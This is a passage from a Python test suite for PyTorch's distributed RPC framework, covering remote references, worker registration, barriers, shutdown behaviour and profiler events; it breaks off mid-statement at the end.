    rref_1 = rpc.remote(peer, my_function, args=(a, b, c))
    rref_2 = rpc.remote(peer, my_function, args=(x, y, z))
    result = rpc.rpc_sync(peer, my_rref_function, args=(rref_1, rref_2))
    self.assertEqual(result, expected)
def _nested_remote(self, f, expected):
    """rpc.remote to one peer where `f` forwards work to a second peer."""
    n = self.rank + 1
    first_peer = worker_name(n % self.world_size)
    second_peer = worker_name((n + 1) % self.world_size)
    result = rpc.remote(first_peer, f, args=(second_peer,)).to_here()
    self.assertEqual(result, expected)
def _nested_rref(self, f, expected1, expected2):
    """Fetch an RRef whose value is a pair of RRefs living on a third worker."""
    n = self.rank + 1
    peer_b = worker_name(n % self.world_size)
    peer_c = worker_name((n + 1) % self.world_size)
    rref_of_rrefs = rpc.remote(peer_b, f, args=(peer_c,))
    # Say C has 2 OwnerRRefs; B holds 2 UserRRefs to them. Fetching here is
    # effectively A asking B to share its 2 UserRRefs.
    inner = rref_of_rrefs.to_here()
    self.assertEqual(len(inner), 2)
    self.assertEqual(inner[0].to_here(), expected1)
    self.assertEqual(inner[1].to_here(), expected2)
def _nested_rref_stress(self, f, expected1, expected2):
    """Stress-test nested RRef sharing: 20 concurrent rpc.remote calls, then verify each."""
    n = self.rank + 1
    peer_b = worker_name(n % self.world_size)
    peer_c = worker_name((n + 1) % self.world_size)
    all_rrefs = [rpc.remote(peer_b, f, args=(peer_c,)) for _ in range(20)]
    for rref_of_rrefs in all_rrefs:
        inner = rref_of_rrefs.to_here()
        self.assertEqual(len(inner), 2)
        self.assertEqual(inner[0].to_here(), expected1)
        self.assertEqual(inner[1].to_here(), expected2)
def _my_parameter_server(self, sparse):
    """Spawn one trainer per peer, all sharing a single parameter-server RRef."""
    ps_rref = RRef(MyParameterServer(self.world_size - 1))
    trainer_futs = [
        rpc.rpc_async(
            worker_name((self.rank + offset) % self.world_size),
            self._trainer_func,
            args=(ps_rref, sparse),
        )
        for offset in range(1, self.world_size)
    ]
    torch.futures.wait_all(trainer_futs)
def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
    """Verify Future(devices=[...]) synchronizes CUDA streams on wait().

    `wrapper`/`unwrapper` pack and unpack the tensor stored in the future
    (e.g. wrapping it in a container type).
    """
    # We check proper CUDA stream synchronization by adding to the tensor
    # in one stream to get the expected value, and reading it from another stream.
    future = Future(devices=["cuda:0"])
    with torch.cuda.device("cuda:0"):
        stream = torch.cuda.Stream()
        another_stream = torch.cuda.Stream()
        with torch.cuda.stream(stream):
            if sparse_tensor:
                tensor = build_sparse_tensor().to("cuda:0")
                add_tensor = build_sparse_tensor().to("cuda:0")
                expected_tensor = (tensor + add_tensor).coalesce()
            else:
                tensor = torch.zeros((100,), device="cuda:0")
                add_tensor = torch.ones((100,), device="cuda:0")
                expected_tensor = tensor + add_tensor
            # Busy-wait on the device so the in-place add below is still in
            # flight when the consumer stream starts reading.
            torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
            tensor += add_tensor
            if sparse_tensor:
                tensor = tensor.coalesce()
            future.set_result(wrapper(tensor))
        with torch.cuda.stream(another_stream):
            # future.wait() must make this stream wait for the producer's work.
            tensor = unwrapper(future.wait())
            if sparse_tensor:
                self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
                self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
                self.assertEqual(tensor.size(), expected_tensor.size())
            else:
                self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
class RpcTest(RpcAgentTestFixture, RpcTestCommon):
@dist_init
def test_worker_id(self):
    """get_worker_info reports correct names for self and peer, and rejects unknown names."""
    peer_rank = (self.rank + 1) % self.world_size
    me = rpc.get_worker_info()
    peer = rpc.get_worker_info(worker_name(peer_rank))
    self.assertEqual(me.name, worker_name(self.rank))
    self.assertEqual(peer.name, worker_name(peer_rank))
    with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
        rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
    """The agent reports exactly one WorkerInfo per rank, with matching names and ids."""
    infos = rpc.api._get_current_rpc_agent().get_worker_infos()
    self.assertEqual(
        {info.name for info in infos},
        {worker_name(rank) for rank in range(self.world_size)},
    )
    self.assertEqual(
        {info.id for info in infos},
        set(range(self.world_size)),
    )
@dist_init
def test_self_add(self):
    """Both async and sync self-RPC of torch.add return the expected sum.

    Fix: removed the unused local `self_worker_name` (flake8 F841).
    """
    self_worker_info = rpc.get_worker_info()
    fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
    ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
    self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
    self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
    """Dense-tensor RPC addressed by integer rank, plus rejection of invalid ranks."""
    dst_rank = (self.rank + 1) % self.world_size
    modes = [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]

    # A valid peer rank works in every execution mode.
    for exec_mode in modes:
        ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
        self.assertEqual(ret, torch.ones(2, 2) + 1)

    # Out-of-range integer ranks raise RuntimeError; fractional ranks raise
    # ValueError. Order matches the original test exactly.
    for bad_rank, expected_error in [
        (self.world_size + 1, RuntimeError),
        (-1, RuntimeError),
        (dst_rank + 0.5, ValueError),
        (dst_rank - 0.5, ValueError),
    ]:
        for exec_mode in modes:
            with self.assertRaises(expected_error):
                self._run_func_in_mode(bad_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
    """Remote UDF targeted at this worker itself."""
    self._self_py_udf_remote(rpc.get_worker_info(), torch.ones(2, 2), 1, 3)
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
    """A self-owned RRef is passed as an RPC argument to the next worker."""
    peer = worker_name((self.rank + 1) % self.world_size)
    self._self_remote_rref_as_rpc_arg(peer, torch.ones(2, 2), 1, 3)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
    """A self-owned RRef is passed as an RPC argument back to this same worker."""
    self._self_remote_rref_as_rpc_arg(rpc.get_worker_info(), torch.ones(2, 2), 1, 3)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
    """A self-owned RRef is passed as an rpc.remote argument to the next worker."""
    peer = worker_name((self.rank + 1) % self.world_size)
    self._self_remote_rref_as_remote_arg(peer, torch.ones(2, 2), 1, 3)
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
    """A self-owned RRef is passed as an rpc.remote argument back to this same worker."""
    self._self_remote_rref_as_remote_arg(rpc.get_worker_info(), torch.ones(2, 2), 1, 3)
@dist_init
def test_rref_proxy_non_exist(self):
    """Calling a nonexistent attribute through any RRef proxy raises AttributeError."""
    peer = worker_name((self.rank + 1) % self.world_size)
    rref = rpc.remote(peer, my_function, args=(torch.ones(2, 2), 1, 3))
    msg = "has no attribute \'non_exist\'"
    with self.assertRaisesRegex(AttributeError, msg):
        rref.rpc_sync().non_exist()
    with self.assertRaisesRegex(AttributeError, msg):
        rref.rpc_async().non_exist().wait()
    with self.assertRaisesRegex(AttributeError, msg):
        rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
    """Tensor methods invoked through rpc_sync/rpc_async/remote RRef proxies."""
    rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
    local = torch.ones(2, 2) + 1 + 3
    self.assertEqual(local.size(), rref.rpc_sync().size())
    self.assertEqual(local + 1, rref.rpc_async().add(1).wait())
    self.assertEqual(local.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
    """RRef tensor proxies against the next worker."""
    peer = worker_name((self.rank + 1) % self.world_size)
    self._test_rref_proxy_tensor(peer)
@dist_init
def test_rref_proxy_tensor_self(self):
    """RRef tensor proxies against this worker itself."""
    self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
    """Each proxy flavor may be created once and reused for several method calls."""
    peer = worker_name((self.rank + 1) % self.world_size)
    rref = rpc.remote(peer, my_function, args=(torch.ones(2, 2), 1, 3))
    local = torch.ones(2, 2) + 1 + 3

    sync_proxy = rref.rpc_sync()
    async_proxy = rref.rpc_async()
    remote_proxy = rref.remote()

    self.assertEqual(local.size(), sync_proxy.size())
    self.assertEqual(local + 1, sync_proxy.add(1))
    self.assertEqual(local.view(1, 4), sync_proxy.view(1, 4))

    self.assertEqual(local.size(), async_proxy.size().wait())
    self.assertEqual(local + 3, async_proxy.add(3).wait())
    self.assertEqual(local.view(4, 1), async_proxy.view(4, 1).wait())

    self.assertEqual(local.size(), remote_proxy.size().to_here())
    self.assertEqual(local + 5, remote_proxy.add(5).to_here())
    self.assertEqual(local.view(-1), remote_proxy.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
    """Exercise RRef proxies against a remote MyClass instance.

    Covers instance, static, and class methods through all three proxy
    flavors, and checks that remote mutations accumulate correctly.
    """
    rref = rpc.remote(dst, MyClass, args=(7,))
    expected = MyClass(7)
    self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
    self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
    self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())

    # Local mirror is incremented by 3; the remote instance is incremented
    # by 1 three times (once per proxy flavor), so the two stay equal.
    expected.increment_value(3)
    self.assertEqual(None, rref.rpc_sync().increment_value(1))
    self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
    self.assertEqual(None, rref.remote().increment_value(1).to_here())

    self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
    self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
    self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())

    self.assertEqual(
        expected.my_instance_method(2),
        rref.rpc_sync().my_instance_method(2)
    )
    self.assertEqual(
        expected.my_instance_method(3),
        rref.rpc_async().my_instance_method(3).wait()
    )
    self.assertEqual(
        expected.my_instance_method(4),
        rref.remote().my_instance_method(4).to_here()
    )

    self.assertEqual(
        expected.my_static_method(9),
        rref.rpc_sync().my_static_method(9)
    )
    self.assertEqual(
        expected.my_static_method(10),
        rref.rpc_async().my_static_method(10).wait()
    )
    self.assertEqual(
        expected.my_static_method(11),
        rref.remote().my_static_method(11).to_here()
    )

    self.assertEqual(
        expected.my_class_method(2, torch.zeros(2, 2)),
        rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
    )
    self.assertEqual(
        expected.my_class_method(2, torch.ones(3, 3)),
        rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
    )
    self.assertEqual(
        expected.my_class_method(2, torch.ones(4, 4)),
        rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
    )
@dist_init
def test_rref_proxy_class(self):
    """RRef class proxies against the next worker."""
    peer = worker_name((self.rank + 1) % self.world_size)
    self._test_rref_proxy_class(peer)
@dist_init
def test_rref_proxy_class_self(self):
    """RRef class proxies against this worker itself."""
    self._test_rref_proxy_class(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
    self, mock_rpc_agent, mock_dist_autograd_init
):
    """A custom backend can be registered once; re-registration fails.

    Autograd init and agent startup are mocked out, so init_rpc only
    exercises the backend-registry plumbing.
    """
    backend_name = "stub_backend"

    backend = rpc.backend_registry.register_backend(
        backend_name,
        _stub_construct_rpc_backend_options_handler,
        _stub_init_rpc_backend_handler,
    )

    # Registering the same name twice must be rejected.
    with self.assertRaisesRegex(
        RuntimeError, "^RPC backend .+: already registered$"
    ):
        backend = rpc.backend_registry.register_backend(
            backend_name,
            _stub_construct_rpc_backend_options_handler,
            _stub_init_rpc_backend_handler,
        )

    rpc.init_rpc(
        name="worker1",
        backend=backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
    """Registering under a name that is already taken raises "is not unique"."""
    with self.assertRaisesRegex(RuntimeError, "is not unique"):
        store, _, _ = next(
            torch.distributed.rendezvous(
                self.init_method, rank=self.rank, world_size=self.world_size
            )
        )
        # Every rank registers the same name, so all but the first collide.
        rpc._init_rpc_backend(
            backend=self.rpc_backend,
            store=store,
            name="duplicate_name",
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
    """init_rpc rejects a worker name already claimed by another rank.

    rank % (world_size - 1) maps two ranks onto the same name.
    """
    with self.assertRaisesRegex(RuntimeError, "is not unique"):
        rpc.init_rpc(
            name=worker_name(self.rank % (self.world_size - 1)),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
@dist_init(setup_rpc=False)
def test_reinit(self):
    """Calling init_rpc a second time on an initialized worker must fail."""
    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )

    initialize_pg(self.file_init_method, self.rank, self.world_size)
    # Wait for all init to complete.
    dist.barrier()

    # TODO: with TCP init, rank 0 raises Address already in use because
    # rank 0 is the start daemon and the store is created before checking if
    # RPC is already initialized in init_rpc.
    if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
        expected_reinit_err = "Address already in use"
    else:
        expected_reinit_err = "is already initialized"

    with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
    rpc.shutdown()
@dist_init(setup_rpc=False)
def test_pg_init_no_rpc_init(self):
    """A process group alone is not enough: creating RRefs requires RPC init."""
    dist.init_process_group(
        backend='gloo',
        init_method=self.file_init_method,
        rank=self.rank,
        world_size=self.world_size)

    class MyModel(torch.nn.Module):
        def __init__(self):
            super().__init__()
            self.lin = torch.nn.Linear(3, 4)

        def forward(self, x):
            return self.lin(x)

    model = MyModel()
    model.train()
    model = torch.nn.parallel.DistributedDataParallel(model)

    with self.assertRaisesRegex(RuntimeError, 'Current RPC agent is not set! Did you initialize the RPC framework'):
        # The first RRef construction raises because RPC was never initialized.
        [RRef(param) for param in model.parameters()]
def test_world_size_one(self):
    """Single-process RPC world exercising sync/async/remote self-calls."""
    self._world_size_one(torch.ones(2, 2), torch.ones(2, 2))
@dist_init(setup_rpc=False)
def test_invalid_names(self):
    """WorkerInfo rejects malformed worker names.

    Fixes: dropped the unused `info = ...` bindings (F841) and replaced
    `"".join(["a" for i in range(500)])` with the idiomatic `"a" * 500`.
    """
    worker_id = 0
    with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
        WorkerInfo("abc*", worker_id)

    with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
        WorkerInfo(" ", worker_id)

    with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
        WorkerInfo("", worker_id)

    # If the number in the message does not match, it is likely that the
    # value of MAX_NAME_LEN in RPC WorkerInfo has changed.
    with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
        WorkerInfo("a" * 500, worker_id)
# Test that WorkerInfo can be pickled and sent in RPC call
@dist_init
def test_worker_info_pickle(self):
    """A WorkerInfo survives a round trip through an RPC to the next rank."""
    peer = worker_name((self.rank + 1) % self.world_size)
    my_info = rpc.api.get_worker_info()
    echoed = rpc.rpc_sync(peer, identity, args=(my_info,))
    self.assertEqual(echoed, my_info)
@dist_init
def test_add(self):
    """Sync RPC of torch.add with n-by-n ones tensors."""
    n = self.rank + 1
    result = rpc.rpc_sync(
        worker_name(n % self.world_size),
        torch.add,
        args=(torch.ones(n, n), torch.ones(n, n)),
    )
    self.assertEqual(result, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
    """Return the worker id of whichever worker executes this function."""
    callee_info = rpc.get_worker_info()
    return callee_info.id
@dist_init
def test_int_callee(self):
    """RPCs may address the destination by bare integer rank."""
    peer_rank = (self.rank + 1) % self.world_size
    self.assertEqual(rpc.rpc_sync(peer_rank, RpcTest.return_callee_id), peer_rank)
@dist_init
def test_add_with_id(self):
    """Sync RPC addressed via a WorkerInfo object rather than a name string.

    Fix: corrected the misspelled local variable `workder_info`.
    """
    n = self.rank + 1
    dst_rank = n % self.world_size
    worker_info = rpc.get_worker_info(worker_name(dst_rank))

    ret = rpc.rpc_sync(
        worker_info, torch.add, args=(torch.ones(n, n), torch.ones(n, n))
    )
    self.assertEqual(ret, torch.ones(n, n) * 2)
@dist_init
def test_scalar_add(self):
    """torch.add with a tensor and a Python scalar over RPC."""
    n = self.rank + 1
    peer = worker_name(n % self.world_size)
    result = rpc.rpc_sync(peer, torch.add, args=(torch.ones(n, n), n))
    self.assertEqual(result, torch.ones(n, n) + n)
@dist_init
def test_async_add(self):
    """Async RPC returns a future resolving to the expected sum."""
    n = self.rank + 1
    peer = worker_name(n % self.world_size)
    fut = rpc.rpc_async(peer, torch.add, args=(torch.ones(n, n), torch.ones(n, n)))
    self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_nonzero(self):
    """torch.nonzero over RPC matches the local result."""
    peer = worker_name((self.rank + 1) % self.world_size)
    x = torch.ones(self.world_size, self.world_size)
    x[self.rank][self.rank] = 0
    remote_result = rpc.rpc_sync(peer, torch.nonzero, args=(x,))
    self.assertEqual(remote_result, x.nonzero())
@dist_init
def test_multi_rpc(self):
    """Dense-tensor variant of the repeated-RPC test."""
    self._multi_rpc(False)
@dist_init
def test_future_wait_twice(self):
    """An errored future re-raises its exception on every wait, including via wait_all."""
    peer = worker_name((self.rank + 1) % self.world_size)
    futs = [rpc.rpc_async(peer, raise_func) for _ in range(20)]

    with self.assertRaisesRegex(ValueError, "Expected error"):
        torch.futures.wait_all(futs)

    for fut in futs:
        with self.assertRaisesRegex(ValueError, "Expected error"):
            fut.wait()
def _run_uneven_workload(self, f, x, num_repeat=30):
    """Drive an intentionally uneven workload from worker0.

    Phase 1 loads only worker1, phase 2 only worker2, so a correct
    join/shutdown implementation must keep idle workers alive until
    all outstanding RPCs complete.
    """
    # worker0 drives and waits for worker1 and worker2
    # throughout the test.
    if self.rank == 0:
        self.assertTrue(self.world_size >= 3)

        # Phase 1: Only worker1 has workload.
        dst = "worker1"
        futs = []
        for _ in range(num_repeat):
            fut = rpc.rpc_async(dst, f, args=(x,))
            futs.append(fut)

        for fut in torch.futures.collect_all(futs).wait():
            self.assertEqual(fut.wait(), 0)

        # Phase 2: Only worker2 has workload.
        # If join is not correctly implemented,
        # worker2 should be closed by now.
        dst = "worker2"
        futs = []
        for _ in range(num_repeat):
            fut = rpc.rpc_async(dst, f, args=(x,))
            futs.append(fut)

        for val in torch.futures.wait_all(futs):
            self.assertEqual(val, 0)
@dist_init(setup_rpc=False)
def test_wait_all_workers_timeout(self):
    """A slow _wait_all_workers must surface a timeout during graceful shutdown."""
    initialize_pg(self.file_init_method, self.rank, self.world_size)

    rpc.init_rpc(
        name=worker_name(self.rank),
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )

    og_func = rpc.api._wait_all_workers

    def wait_all_workers_sleep(timeout):
        # Deliberately slow gather: pickling SlowPickleClass sleeps 0.5s,
        # which exceeds the 0.01s shutdown timeout used below.
        try:
            rpc.api._all_gather(SlowPickleClass(0.5), timeout=timeout)
        except RuntimeError as ex:
            raise ex

    rpc.api._wait_all_workers = wait_all_workers_sleep

    try:
        with self.assertRaisesRegex(RuntimeError, ''):
            rpc.shutdown(graceful=True, timeout=0.01)
    finally:
        # Always restore the patched module-level function.
        rpc.api._wait_all_workers = og_func
    dist.barrier()
def test_wait_all_workers_dense(self):
    """_wait_all_workers with a heavy dense-tensor workload."""
    self._wait_all_workers(heavy_rpc, torch.ones(100, 100))
def test_wait_all_workers_twice_dense(self):
    """Repeated _wait_all_workers with a heavy dense-tensor workload."""
    self._wait_all_workers_twice(heavy_rpc, torch.ones(100, 100))
@dist_init
def test_all_gather(self):
    """_all_gather collects every worker's contribution keyed by worker name."""
    my_id = rpc.get_worker_info().id
    results = rpc.api._all_gather(my_id)
    expected = {
        info.name: info.id
        for info in rpc._get_current_rpc_agent().get_worker_infos()
    }
    self.assertEqual(expected, results)
@dist_init
def test_all_gather_timeout(self):
    """_all_gather honors the configured RPC timeout on every rank."""
    rpc._set_rpc_timeout(0.1)

    # Rank 0 sees the leader-side message; other ranks see the agent's
    # generic timeout error.
    if self.rank == 0:
        expected_error = "timed out in _all_gather after 0\\.10 seconds"
    else:
        expected_error = self.get_timeout_error_regex()

    with self.assertRaisesRegex(RuntimeError, expected_error):
        rpc.api._all_gather(SlowPickleClass(0.5))
def _test_barrier_helper(self, info, names, multi_threaded=False):
    """Run two barrier rounds over `names`, checking the leader's counter when single-threaded."""
    names = sorted(names)
    leader = names[0]
    rpc.rpc_sync(leader, _reset_count)
    check_count = not multi_threaded and info.name == leader
    if check_count:
        self.assertEqual(_rpc_barrier_count, 0)
    rpc.api._barrier(names)
    rpc.rpc_sync(leader, _increment_count)
    rpc.api._barrier(names)
    if check_count:
        self.assertEqual(_rpc_barrier_count, len(names))
@dist_init
def test_rpc_barrier_all(self):
    # Test rpc barrier when called with full list of workers
    info = rpc.get_worker_info()
    names = [w.name for w in rpc._get_current_rpc_agent().get_worker_infos()]
    self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_subset(self):
    # Test rpc barrier when processes are called with different subsets of the full list
    info = rpc.get_worker_info()
    all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
    # Odd-id workers form one barrier group, even-id workers the other.
    wanted_parity = bool(info.id % 2)
    names = [w.name for w in all_worker_info if bool(w.id % 2) == wanted_parity]
    self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_partial_subset(self):
    # Test rpc barrier when some processes are not involved in the barrier
    info = rpc.get_worker_info()
    all_worker_info = rpc._get_current_rpc_agent().get_worker_infos()
    if info.id % 2:
        names = [w.name for w in all_worker_info if w.id % 2]
    else:
        # Even-id workers barrier only with themselves.
        names = [f"worker{info.id}"]
    self._test_barrier_helper(info, names)
@dist_init
def test_rpc_barrier_multithreaded(self):
    # This tests validates the implementation of barrier when multiple threads call into it
    # We only need to check that it does not hang in this case
    info = rpc.get_worker_info()
    names = [w.name for w in rpc._get_current_rpc_agent().get_worker_infos()]
    threads = [
        threading.Thread(target=self._test_barrier_helper, args=(info, names, True))
        for _ in range(3)
    ]
    for th in threads:
        th.start()
    for th in threads:
        th.join()
@dist_init
def test_graceful_shutdown_with_uneven_workload(self):
    """Test graceful termination."""
    # The shared driver loads worker1 first, then worker2; graceful shutdown
    # must keep idle workers alive until all outstanding RPCs complete.
    self._run_uneven_workload(heavy_rpc, torch.ones(100, 100))
@dist_init(setup_rpc=False)
def test_shutdown_followed_by_rpc(self):
    """After rpc.shutdown(), further RPC attempts raise a clear error."""
    # Initialize RPC.
    rpc.init_rpc(
        name="worker%d" % self.rank,
        backend=self.rpc_backend,
        rank=self.rank,
        world_size=self.world_size,
        rpc_backend_options=self.rpc_backend_options,
    )

    n = self.rank + 1
    peer = worker_name(n % self.world_size)
    self.assertEqual(
        rpc.rpc_sync(peer, torch.add, args=(torch.ones(n, n), torch.ones(n, n))),
        torch.ones(n, n) * 2,
    )
    rpc.shutdown()

    with self.assertRaisesRegex(RuntimeError, "^RPC has not been initialized"):
        rpc.rpc_sync(peer, torch.add, args=(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_expected_src(self):
    """Each worker records the rank of the peer that set a value on it."""
    dst_rank = (self.rank + 1) % self.world_size
    expected_src_rank = (self.rank - 1) % self.world_size
    rpc.rpc_sync(worker_name(dst_rank), set_value, args=(self.rank,))
    self.assertEqual(VALUE_FUTURE.result(), expected_src_rank)
@dist_init
def test_py_built_in(self):
    """A Python builtin (min) can be invoked over RPC."""
    n = self.rank + 1
    peer = worker_name(n % self.world_size)
    remote_min = rpc.rpc_sync(peer, min, args=(n, n + 1, n + 2))
    self.assertEqual(remote_min, min(n, n + 1, n + 2))
@dist_init
def test_py_user_defined(self):
    """A user-defined function can be invoked over RPC with keyword arguments."""
    n = self.rank + 1
    peer = worker_name(n % self.world_size)
    call_kwargs = {"a": n, "b": n + 1, "c": n + 2}
    self.assertEqual(
        rpc.rpc_sync(peer, my_function, kwargs=call_kwargs),
        my_function(n, n + 1, n + 2),
    )
def test_build_rpc_profiling_key(self):
    # Tests that the name that shows up as an Event in profiling RPCs has all
    # the necessary information.
    for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
        key = _build_rpc_profiling_key(exec_mode, "foo", "worker0", "worker1")
        for fragment in (exec_mode.value, "foo", "worker0", "worker1"):
            self.assertIn(fragment, key)
def check_profiling_info(self, self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode):
    """Validate that a profiled RPC event's name encodes caller, callee, function, and mode.

    Fix: use assertIn instead of assertTrue(x in y) so failures report the
    event name being searched (unittest idiom).
    """
    self.assertIn(self_worker_name, rpc_event.name)
    self.assertIn(dst_worker_name, rpc_event.name)
    if isinstance(func, torch.jit.ScriptFunction):
        self.assertIn(torch._jit_internal._qualified_name(func), rpc_event.name)
    else:
        self.assertIn(func.__name__, rpc_event.name)
    self.assertIn(rpc_exec_mode.value, rpc_event.name)
    # The RPC should be profiled exactly once.
    self.assertEqual(rpc_event.count, 1)
@dist_init
def test_profiler_rpc_record_shapes(self):
    """Remote op input shapes recorded by the profiler match an equivalent local run."""
    if self.rank != 1:
        return
    dst_worker = worker_name((self.rank + 1) % self.world_size)
    t1, t2 = torch.ones(100), torch.ones(100)

    def first_add_shapes(events):
        # Input shapes of the first aten::add event among the given events.
        adds = [e for e in events if "aten::add" in e.name]
        return adds[0].input_shapes

    with _profile(record_shapes=True) as prof:
        rpc.rpc_sync(dst_worker, torch.add, args=(t1, t2))

    remote_events = [e for e in prof.function_events if e.is_remote]
    remote_add_input_shapes = first_add_shapes(remote_events)

    # Run profiler on equivalent local op and validate shapes are the same.
    with _profile(record_shapes=True) as local_prof:
        torch.add(t1, t2)

    local_add_input_shapes = first_add_shapes(local_prof.function_events)
    self.assertEqual(remote_add_input_shapes, local_add_input_shapes)
@dist_init
def test_profiler_rpc_memory(self):
    """cpu_memory_usage propagates over the wire iff profile_memory=True.

    Fixes: set comprehension instead of set(generator) (ruff C401) and
    dropped the unused `res` binding (F841).
    """
    if self.rank != 1:
        return
    dst = (self.rank + 1) % self.world_size
    dst_worker = worker_name(dst)
    with _profile(profile_memory=True) as p:
        fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
        fut.wait()

    function_events = p.function_events
    event_cpu_mem_usages = {event.cpu_memory_usage for event in function_events}
    # if cpu_memory_usage was not propagated over the wire, this set would
    # only contain 0 (indicates no memory being profiled)
    self.assertNotEqual({0}, event_cpu_mem_usages)
    # No memory profiled if profile_memory=False
    with _profile(profile_memory=False) as p:
        fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
        fut.wait()

    function_events = p.function_events
    event_cpu_mem_usages = {event.cpu_memory_usage for event in function_events}
    self.assertEqual({0}, event_cpu_mem_usages)
@dist_init
def test_profiler_export_trace(self):
    """An exported chrome trace contains the expected remote events.

    Fixes: any() over a generator instead of a temporary list (ruff C419)
    and dropped the unused `res` binding (F841).
    """
    if self.rank != 1:
        return
    dst = (self.rank + 1) % self.world_size
    dst_worker = worker_name(dst)
    with _profile() as p:
        fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
        fut.wait()  # result unused; we only need the RPC to finish

    # NOTE(review): `events` appears unused, but accessing function_events
    # forces event aggregation before the export below — kept deliberately.
    events = p.function_events

    with TemporaryFileName() as fname:
        path = fname
        p.export_chrome_trace(path)
        with open(path) as f:
            trace = json.load(f)
            event_names = [event['name'] for event in trace]
            for expected_event_name in EXPECTED_REMOTE_EVENTS + [RPCExecMode.ASYNC.value]:
                event_exists = any(
                    expected_event_name in event_name for event_name in event_names
                )
                self.assertTrue(event_exists)
@dist_init
def test_profiler_rpc_key_names(self):
    """Remote profiler events must be prefixed with the RPC profiling key."""
    # tests that remote events are properly prefixed with the RPC profiling key.
    if self.rank != 1:
        return

    # Spawn multiple threads that send RPCs to ensure keys are correctly
    # prefixied when there are multiple RPCs being created/in flight at the
    # same time.
    dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]

    def rpc_with_profiling(dst_worker):
        # Profile one async RPC and validate every remote event's name.
        with _profile() as prof:
            fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
            fut.wait()

        events = prof.function_events
        remote_event_names = {
            event.name: event for event in events if event.is_remote
        }
        rpc_profiling_key = _build_rpc_profiling_key(
            RPCExecMode.ASYNC,
            udf_with_torch_ops.__qualname__,
            worker_name(self.rank),
            dst_worker,
        )

        remote_event_name_set = set(EXPECTED_REMOTE_EVENTS)
        for name, event in remote_event_names.items():
            # Ensure that we have the expected key as part of the remote
            # event.
            self.assertTrue(name.startswith(rpc_profiling_key))
            self.assertTrue(event.is_remote)
            self.assertTrue(event.node_id == rpc.get_worker_info(dst_worker).id)
            # Ensure that the remote event name also contains the operator.
            operator_name_substr = name[len(rpc_profiling_key) :]
            # Note: we don't assert that every remote event needs to be
            # in the above set, the set is just a representative set of
            # what we expect to see. The profiler can change and add more
            # events, but we should always expect to see this representative
            # set.
            matching_event = {
